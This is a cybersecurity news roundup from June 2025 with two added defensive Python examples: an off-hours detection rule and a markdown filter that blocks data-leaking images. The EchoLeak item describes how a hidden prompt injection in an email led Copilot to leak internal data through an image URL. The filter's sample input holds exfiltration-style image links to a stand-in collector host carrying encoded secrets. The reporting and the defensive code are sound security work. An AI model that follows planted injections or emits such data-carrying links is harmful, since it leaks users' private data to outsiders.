Cyber News Roundup for June 13, 2025
Hacking the Hackers: When Bad Guys Let Their Guard Down
A string of operational security failures by threat actors has unexpectedly empowered defenders in what’s being dubbed “Hacking the Hackers.” According to Dark Reading’s analysis, live leaks of memory footprints and internal communications—often resulting from poor cleanup or disgruntled insiders—have provided defenders with direct visibility into the playbooks of malware and ransomware groups like DanaBot, Black Basta, and Conti. These lapses let researchers reconstruct attack sequences, tooling choices, and command-and-control (C2) infrastructures with clarity rarely afforded. Notably, this trend emphasizes that defenders sometimes gain the upper hand not through flawless work of their own, but thanks to threat actors’ own mistakes. This shift enables more proactive defense measures, including early detection signatures and threat hunting routines built on adversary-specific artifacts. The analysis highlights how vigilant defenders are increasingly “hacking the hackers” by exploiting adversaries’ carelessness to enhance organizational resilience.
GitLab patches multiple vulnerabilities in its DevSecOps platform
GitLab has issued urgent security updates to patch multiple vulnerabilities in its DevSecOps platform. The flaws include account takeover risks and the ability for attackers to inject malicious jobs into CI/CD pipelines. The fixes are included in GitLab versions 18.0.2, 17.11.4, and 17.10.8. Critical issues addressed include HTML injection (CVE-2025-4278), missing authorization (CVE-2025-5121), cross-site scripting (CVE-2025-2254), and a denial-of-service flaw (CVE-2025-0673). GitLab.com is already patched, and users of self-managed instances are urged to upgrade immediately.
Researchers unveil a covert method for exfiltrating data using smartwatches
Researchers in Israel have unveiled “SmartAttack,” a covert method for exfiltrating data from air-gapped systems using smartwatches. The attack involves malware on a secure, isolated computer emitting ultrasonic signals via built-in speakers. These inaudible tones, modulated to carry data, are picked up by a smartwatch microphone worn nearby. The watch then transmits the data via Wi-Fi, Bluetooth, or cellular networks. Though challenging and theoretical, the attack shows how insider threats can bypass physical isolation. Experts recommend banning smartwatches and disabling speakers in sensitive areas to mitigate risk.
Erie Insurance has confirmed a cyberattack as the root cause of recent operational disruptions, raising concerns about potential data exposure
The Pennsylvania-based insurer acknowledged that a June 2024 cybersecurity incident was responsible for delays and interruptions to its customer services. Although the company has not disclosed the exact nature of the attack, it confirmed the involvement of an unauthorized third party and is actively working with forensic experts to investigate the scope of the breach. Erie has also involved law enforcement and taken steps to restore normal operations. At this time, it’s unclear whether customer or employee data was compromised, but the company promises to notify affected individuals should any data exposure be confirmed. This incident highlights the growing risk that cyberattacks pose to financial services organizations, which are often prime targets for threat actors seeking sensitive personal information.
Google Cloud and Cloudflare outages reported
Google Cloud and Cloudflare suffered outages yesterday, affecting services such as Google Home/Nest, Snapchat, Discord, Shopify and Spotify, as well as creating access authentication failures and Cloudflare Zero Trust WARP connectivity issues. Downdetector received tens of thousands of reports, with impacted users experiencing Cloudflare and Google Cloud server connection, website, and hosting problems. The issue started around 1:15 p.m. ET and was being resolved through the afternoon.
Journalists are confirmed targets of Paragon’s Graphite spyware
A forensic investigation by Citizen Lab has confirmed that Paragon’s Graphite spyware was used in zero-click attacks targeting iPhones of at least two journalists in Europe. The attacks exploited a then-unknown vulnerability in iOS 18.2.1, now tracked as CVE-2025-43200, which allowed malicious photos or videos shared via iCloud Links to compromise devices. Apple notified the victims on April 29, identifying the spyware as “advanced.” The Graphite platform is believed to be part of Paragon’s mercenary spyware operations. The flaw has since been patched by Apple.
Librarian Ghouls’ Cyberattackers Strike at Night
A stealthy threat group known as “Librarian Ghouls” has been quietly targeting Russian organizations in a prolonged cyberespionage campaign.
According to Kaspersky researchers, the group has operated since at least December 2024 and focuses on stealing sensitive data while minimizing its digital footprint. Librarian Ghouls employs “living-off-the-land” techniques, using legitimate administrative tools like 4t Tray Minimizer and Mipko employee monitoring software to blend into normal system activity and avoid detection. They launch their attacks during off-hours—primarily at night and on weekends—reducing the likelihood of triggering alarms. The attackers also leverage PowerShell scripts and custom info-stealers to extract data, particularly targeting email communications. This campaign exemplifies the increasing sophistication of threat actors who avoid traditional malware in favor of covert, tool-based persistence.
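The off-hours timing described above is itself a detection opportunity: a calendar-aware rule that treats any execution of a dual-use admin tool outside business hours as a high-priority event will catch activity that a volume-based alert misses. The following is an added example, not code from Kaspersky or from this report; the pipe-delimited process events, the executable and script names, the business-hours window and the watchlist substrings are all constructed for illustration.

```python
from datetime import datetime, time

# Local business hours and working days (constructed policy; tune per site).
BUSINESS_START = time(8, 0)
BUSINESS_END = time(19, 0)
WORKDAYS = {0, 1, 2, 3, 4}  # Monday..Friday

# Substrings of the legitimate tools the report says were abused, as they
# might appear in a process-name or description field (constructed matching
# terms; real process names vary by version and installer).
WATCHLIST = ("tray minimizer", "mipko", "powershell")


def parse_event(line):
    """Parse 'timestamp|host|user|process|command' into a dict.
    Timestamps are assumed to already be in site-local time."""
    ts, host, user, process, command = line.rstrip("\n").split("|", 4)
    return {"time": datetime.fromisoformat(ts), "host": host, "user": user,
            "process": process, "command": command}


def is_off_hours(dt):
    """True on weekends or outside the [BUSINESS_START, BUSINESS_END) window."""
    if dt.weekday() not in WORKDAYS:
        return True
    return not (BUSINESS_START <= dt.time() < BUSINESS_END)


def on_watchlist(event):
    haystack = (event["process"] + " " + event["command"]).lower()
    return any(tool in haystack for tool in WATCHLIST)


def evaluate(lines):
    """Return alerts for events that fall outside business hours.
    Watchlisted tools running off-hours are rated high, anything else low,
    so analysts triage the living-off-the-land cases first."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if not is_off_hours(ev["time"]):
            continue
        severity = "high" if on_watchlist(ev) else "low"
        alerts.append({"severity": severity, "host": ev["host"],
                       "user": ev["user"], "process": ev["process"],
                       "time": ev["time"].isoformat()})
    return alerts


# Constructed sample events (2025-06-07 is a Saturday, 2025-06-08 a Sunday).
SAMPLE_EVENTS = [
    "2025-06-09T10:15:02|WKS-017|alice|outlook.exe|outlook.exe /recycle",
    "2025-06-09T23:41:17|WKS-017|alice|powershell.exe|powershell.exe -File export-mail.ps1",
    "2025-06-07T03:02:55|SRV-02|itadmin|4t Tray Minimizer|traymin.exe /hide",
    "2025-06-10T12:30:00|WKS-021|bob|powershell.exe|powershell.exe Get-Process",
    "2025-06-08T14:00:00|WKS-021|bob|Mipko Employee Monitor|mipko.exe /install",
    "2025-06-10T20:30:00|WKS-021|bob|notepad.exe|notepad.exe notes.txt",
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert["severity"], alert["time"], alert["host"],
              alert["user"], alert["process"])
```

The rule deliberately keeps daytime use of PowerShell silent: the point is not that these tools are malicious, but that their appearance at 3 a.m. on a Saturday on a server nobody is working on deserves a look. In production the business-hours policy would come from an HR or on-call calendar rather than constants, and the low-severity bucket is what you would baseline per host before promoting it to an alert.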
AI-powered “ghost students” enrolling in online college courses to steal government funds
Financial aid fraud is on the rise, fueled by identity theft and AI-powered “ghost students” enrolling in online college courses to steal government funds. Criminals use stolen personal data to apply for grants and loans, often enrolling in community colleges where low tuition means more aid goes directly to students. In 2024 alone, California colleges reported 1.2 million fake applications, leading to over 223,000 suspected fraudulent enrollments and at least $11.1 million in unrecoverable aid. Victims often learn about the fraud only after seeing credit score drops or loan notifications. Clearing their names can take years. To combat the trend, the U.S. Education Department now requires ID verification for new aid applicants. However, federal staffing cuts may undermine efforts to detect and prevent these increasingly sophisticated scams.
Mozilla patches two critical Firefox security flaws
Mozilla has released Firefox 139.0.4 to patch two critical security flaws that could crash the browser or allow hackers to run malicious code. The first, CVE-2025-49709, involves memory corruption in Firefox’s canvas rendering system. If triggered by specially crafted web content, it could let attackers exploit memory issues and compromise browser stability. The second flaw, CVE-2025-49710, is an integer overflow in Firefox’s JavaScript engine, specifically in the OrderedHashTable structure. This could lead to heap buffer overflows and similar risks when handling JavaScript-heavy websites. Both vulnerabilities are rated high severity with CVSS scores over 8. Mozilla urges users and enterprise admins to update to version 139.0.4 immediately via the built-in updater or Mozilla’s website to protect against potential exploitation.
Zero-click data leak flaw in Copilot
Researchers at Aim Labs documented a flaw in Microsoft 365 Copilot dubbed EchoLeak, part of an emerging class of “LLM Scope Violation” vulnerabilities. By hiding a prompt injection inside an otherwise banal business email, the researchers could get around Microsoft’s cross-prompt injection attack classifier protections. When a user later asks about the email, the Retrieval-Augmented Generation (RAG) engine pulls in the malicious injection, which causes internal data to be inserted into a crafted markdown image and sent to a third-party server. Aim Labs reported the issue to Microsoft back in January, and Microsoft subsequently issued a server-side fix in May.
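The exfiltration channel in that description is a markdown image whose URL carries the stolen data, fetched automatically when the response is rendered. One defensive control is an output filter that refuses to render images from anywhere but an allowlist and treats oversized query strings as a data channel even on trusted hosts. The following is an added example of such a filter, not code from Aim Labs or Microsoft; the allowlisted host, the sample response and the collector hostnames are constructed, and the filter covers both inline and reference-style markdown images, which goes beyond the single form the summary mentions.

```python
import re
from urllib.parse import urlsplit

# Hosts the assistant is permitted to embed images from (constructed allowlist;
# a real deployment would load this from policy).
TRUSTED_IMAGE_HOSTS = {"cdn.example-corp.internal"}
MAX_QUERY_LEN = 64  # longer query strings are treated as a data-carrying channel

# ![alt](url "optional title")  -- inline image, URL captured in group 2
INLINE_IMAGE_RE = re.compile(r'!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)')
# ![alt][id]  -- reference-style image, id captured in group 2
REF_IMAGE_RE = re.compile(r'!\[([^\]]*)\]\[([^\]]+)\]')
# [id]: url   -- reference definition, one per line
REF_DEF_RE = re.compile(r'^[ \t]*\[([^\]]+)\]:[ \t]*<?([^\s>]+)>?[^\n]*$', re.MULTILINE)


def classify_url(url):
    """Return (suspicious, reason) for an image URL found in model output."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return True, "non-http scheme"
    host = (parts.hostname or "").lower()
    if host not in TRUSTED_IMAGE_HOSTS:
        return True, "untrusted host " + host
    if len(parts.query) > MAX_QUERY_LEN:
        return True, "oversized query string"
    return False, ""


def sanitize_markdown(markdown):
    """Strip image references that could carry data off-host.

    Returns (cleaned_markdown, findings); findings lists (url, reason)
    for every image that was removed."""
    findings = []

    def inline_repl(m):
        suspicious, reason = classify_url(m.group(2))
        if suspicious:
            findings.append((m.group(2), reason))
            return "[image removed: " + reason + "]"
        return m.group(0)

    cleaned = INLINE_IMAGE_RE.sub(inline_repl, markdown)

    # Reference-style images resolve through a separate definition line, so
    # the definition is what gets checked. Removing it leaves the reference
    # rendering as plain text instead of fetching anything.
    image_ref_ids = {m.group(2) for m in REF_IMAGE_RE.finditer(cleaned)}

    def def_repl(m):
        ref_id, url = m.group(1), m.group(2)
        if ref_id not in image_ref_ids:
            return m.group(0)  # a plain link definition, not an image; keep it
        suspicious, reason = classify_url(url)
        if suspicious:
            findings.append((url, reason))
            return "[definition removed: " + reason + "]"
        return m.group(0)

    cleaned = REF_DEF_RE.sub(def_repl, cleaned)
    return cleaned, findings


# Constructed sample: a response in which retrieved content has steered the
# model into embedding data-carrying images alongside a legitimate chart.
SAMPLE_RESPONSE = (
    "Summary of the Q2 thread:\n"
    "![chart](https://cdn.example-corp.internal/q2/chart.png)\n"
    "![ ](https://collector.example.net/i.png?d=QVBJX0tFWT1zay1saXZlLTEyMzQ1)\n"
    "![pixel](https://cdn.example-corp.internal/p.gif?v=" + "A" * 80 + ")\n"
    "![logo][ref1]\n"
    "\n"
    "[ref1]: https://collector.example.net/logo.png?u=YWxpY2U\n"
)

if __name__ == "__main__":
    cleaned, findings = sanitize_markdown(SAMPLE_RESPONSE)
    print(cleaned)
    for url, reason in findings:
        print("removed:", url, "->", reason)
```

Checking the query length even for allowlisted hosts matters because any trusted host with an open redirect or a logging endpoint would otherwise become a relay. The filter is a last line of defense at the rendering layer; it does not stop the injection itself, only the automatic fetch that turns a model mistake into a leak, so it belongs alongside, not instead of, input-side classifiers.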
Friendly skies…or friendly spies?
It turns out the major U.S. airlines—yes, the ones that can’t find your luggage—have been quietly selling your domestic flight data to Customs and Border Protection (CBP). An investigative report from 404 Media reveals that through a data broker the airlines own called ARC, airlines shared names, itineraries, and payment info, all while telling CBP not to mention them by name. This cloak-and-dagger data deal, documented through FOIA requests, supports tracking “persons of interest” without pesky things like warrants. The program, known as the Travel Intelligence Program, updates daily and holds over a billion records. Civil liberties advocates are, unsurprisingly, unimpressed. One called it a digital-age revival of the “collect it all” mentality. Meanwhile, Congress is starting to ask airlines why their loyalty programs apparently come with complimentary government surveillance.
Turns out, when it comes to data collection…the sky’s the limit.
Five zero-day vulnerabilities in Salesforce Industry Cloud are uncovered
Security researchers at AppOmni uncovered five zero-day vulnerabilities and 15 serious misconfigurations in Salesforce Industry Cloud, potentially impacting tens of thousands of organizations. Salesforce Industry Cloud offers low-code tools tailored for sectors like healthcare, finance, and government, but its ease of use can lead to risky default settings. Three of the five flaws were fixed by Salesforce directly, while two require customer action. The remaining issues stem from common misconfiguration traps, often caused by non-technical users unknowingly applying insecure access settings. These missteps could lead to major data breaches, including exposure of sensitive health or financial data. AppOmni’s scans show these risks are widespread among Industry Cloud users, raising serious concerns about security in low-code enterprise platforms designed for speed and simplicity.
PoC Code escalates Roundcube Vuln threat
A critical Roundcube webmail flaw with a CVSS score of 9.9 is now a major threat after proof-of-concept code was publicly released. The 10-year-old bug lets authenticated attackers execute remote code via a malicious URL exploiting PHP’s object handling. Over 85,000 unpatched servers are exposed globally. Login credentials are required to exploit it, but attackers can pair it with older credential-theft bugs for full compromise. A patch is available, but researchers warn organizations to update immediately and monitor for malicious activity.
SentinelOne rebuffed a China-linked “PurpleHaze” APT targeting its internal infrastructure
SentinelOne revealed that it was the target of a thwarted cyberattack in October 2024 by a group linked to Chinese nation-state actors, specifically associated with APT15 (also known as Ke3chang or Vixen Panda). The threat actor, referred to as “UNC5174” or “PurpleHaze,” was also found to have compromised over 70 global organizations spanning the defense, telecommunications, and IT sectors. The attackers used legitimate software tools and the ShadowPad malware framework to quietly infiltrate systems and conduct espionage. SentinelOne worked with international security partners to identify and warn affected victims, stressing the importance of proactive threat hunting and detection capabilities. The attack underscores the growing boldness of state-sponsored groups and the strategic value they place on targeting cybersecurity firms themselves.
Chinese hackers target U.S. smartphones
A recent cyberattack targeting smartphones of U.S. officials and professionals in politics, tech, and journalism has raised alarms among cybersecurity experts. Investigators at iVerify linked the unusual crashes to a zero-click hack, likely by Chinese hackers, that allowed access to phones without user interaction. Victims had ties to fields of interest to China’s government.
Experts say smartphones, often less protected than other systems, are becoming key targets for espionage. Devices belonging to Donald Trump’s campaign and top aides were also reportedly targeted. Lawmakers fear Chinese state-owned firms could exploit their tech presence in global networks. The U.S. is responding with new initiatives like a “cyber trust mark” for secure connected devices. Still, officials warn that even the most secure device is vulnerable if users ignore basic precautions. Cyber lapses, like misconfigured apps or unsecured connections, remain a serious national security risk.
United Natural Foods hit by cyberattack
The company confirmed it discovered a cyberattack on June 5, 2025, according to an 8-K filing with the US SEC. United Natural Foods is North America’s largest publicly traded wholesale food distributor, with 53 distribution centers. The company proactively took some systems offline due to the attack, disrupting customer orders. At the same time, anecdotal posts on social media mention some worker shifts cancelled as well. No ransomware group took credit for the attack, and the company has not released further details about any data loss or what systems the attacker accessed.
Russian companies hit with LockBit
You don’t tug on Superman’s cape, you don’t spit into the wind, you don’t pull the mask off of old Lone Ranger, and you don’t have your ransomware affiliates attack Russia. Those used to be the rules. However, the Russian cybersecurity firm Positive Technologies identified a financially motivated group called DarkGaboon that was doing just that: deploying LockBit 3.0 ransomware. Unlike typical LockBit affiliates, DarkGaboon seems to operate entirely independently, using Russian-language phishing emails with malicious attachments posing as legitimate financial documents. Researchers say the group appears to have operated since at least 2023, but its use of open-source tools in other parts of its attack chain made attribution difficult.
FBI keeps Leatherman in its back pocket
FBI Director Kash Patel named agency veteran Brett Leatherman as assistant director and head of the Cyber Division. During his 22-year career, Leatherman served as section chief for cyber investigations and deputy assistant director for the last three years and has been the FBI’s public face for communications on major cyber incidents going back to the Colonial Pipeline attack. He takes over for Bryan Vorndran, who left the FBI to work as Microsoft’s deputy CISO. Given the number of personnel shakeups across government cybersecurity posts since January, this is a notable bit of continuity.
Cloudflare creates OAuth library with Claude
Last week, Cloudflare published an open-sourced OAuth 2.1 library that was written almost entirely by Anthropic’s Claude LLM. Notably, the company also published comprehensive documentation of the process, including a full prompt history. Given the sensitive nature of the library, this was not an exercise in vibe coding; humans reviewed every part of the process. Software developer Max Mitchell reviewed the process and found the LLM excelled when given a substantial code block to work from, with clear context and an explanation of what needed to be changed. In all instances, the LLM excelled at generating documentation. However, the code needed human intervention for styling and other housekeeping tasks. Mitchell suggested treating this like collaborating with a human developer: expect a back-and-forth rather than one-off prompting success. Cloudflare tech lead Kenton Varda, who oversaw the project, came into it with a healthy dose of skepticism, but ended up saying, “I was trying to validate my skepticism. I ended up proving myself wrong.”
(Max Mitchell, Neil Madden, GitHub)
SecOps teams must combat AI “hallucinations” to improve threat detection accuracy
Dark Reading warns that while generative AI accelerates incident detection and response, model hallucinations can generate false positives, mislead analysts, or leave gaps in investigations. Organizations are advised to implement robust model evaluation, training for AI oversight, and processes to cross-check alerts and avoid operational inefficiencies.
ESET uncovers Iranian hackers targeting Kurdish and Iraqi government officials
Iran-linked hackers, identified as BladedFeline, have been conducting a years-long cyberespionage campaign targeting Kurdish and Iraqi government officials, according to ESET. Believed to be a subgroup of Iran’s OilRig (APT34), BladedFeline has operated since at least 2017, initially breaching the Kurdistan Regional Government (KRG) and later expanding to Iraq’s central government and even a telecom provider in Uzbekistan. The group uses custom malware like Shahmaran, Whisper, and PrimeCache to spy on systems, exfiltrate data, and maintain remote access. Entry points likely include exploited server vulnerabilities and webshells. Researchers say the campaign likely supports Iran’s geopolitical goals by monitoring the KRG’s Western ties and countering U.S. influence in Iraq. OilRig has a history of targeting critical sectors and using compromised networks for supply chain attacks.
Hitachi Energy, Acronis and Cisco patch critical vulnerabilities
Hitachi Energy has patched two critical vulnerabilities (CVE-2020-35198 and CVE-2020-28895) in its Relion 670, 650 series, and SAM600-IO devices, which are widely used in power grid protection and control. The flaws could allow remote attackers to trigger memory corruption, risking grid stability. Hitachi Energy has released targeted updates and recommends users upgrade to secure revisions. No public exploitation has been reported, but mitigation steps are advised for older systems.
Acronis Cyber Protect users are urged to update immediately due to multiple critical vulnerabilities, including three with the highest CVSS score of 10.0. These flaws allow attackers to bypass authentication, access sensitive data, and escalate privileges. Updates have been available for a month. If updating isn’t possible right away, restrict network access and monitor systems for suspicious activity.
Cisco has patched 12 vulnerabilities across its products, including a critical flaw (CVE-2025-20286, CVSS 9.9) in cloud deployments of Identity Services Engine (ISE). This bug affects AWS, Azure, and Oracle Cloud ISE instances where shared credentials are improperly generated, allowing attackers to access sensitive data or modify configurations. No workarounds exist, and proof-of-concept (PoC) code is public. Cisco also addressed two high-severity SSH flaws in its IMC and Nexus Dashboard Fabric Controller (CVE-2025-20261 and CVE-2025-20163), which could allow unauthorized access or man-in-the-middle attacks. Additionally, nine medium-severity bugs were patched across various Cisco communication and management tools. Two have public PoC code, though no active exploitation is reported. Cisco strongly urges users to apply updates immediately.
(Beyond Machine, SecurityWeek)
Presidential cyber executive order signed
The President signed a new executive order aimed at refocusing U.S. cybersecurity policy by emphasizing secure software development, updated encryption, and internet routing security. The order revokes parts of Biden- and Obama-era directives, including digital identity initiatives, which it claims could increase fraud risks. It criticizes the previous administration for politicizing cybersecurity and shifts AI policy from potential censorship to identifying vulnerabilities. The order rolls back compliance mandates for software vendors, instead encouraging collaboration with industry partners. It also targets post-quantum cryptography and consumer device security.
OpenAI takes down ChatGPT accounts linked to state-backed hacking, disinformation
The owner of ChatGPT says threat actors from countries such as China, Russia, North Korea, Iran, and the Philippines are using the LLM product for three key areas of activity: social media comment generation; malware refinement and cyberattack assistance; and foreign employment scams. One example: using ChatGPT to publish comments on topics such as U.S. politics on TikTok, X, Reddit, Facebook, and other social media platforms, and then shifting to other accounts that would reply to the same comments. They have also been using it to assist with writing scripts for brute-forcing passwords, as well as in conducting employment scams, including arranging for delivery of company laptops.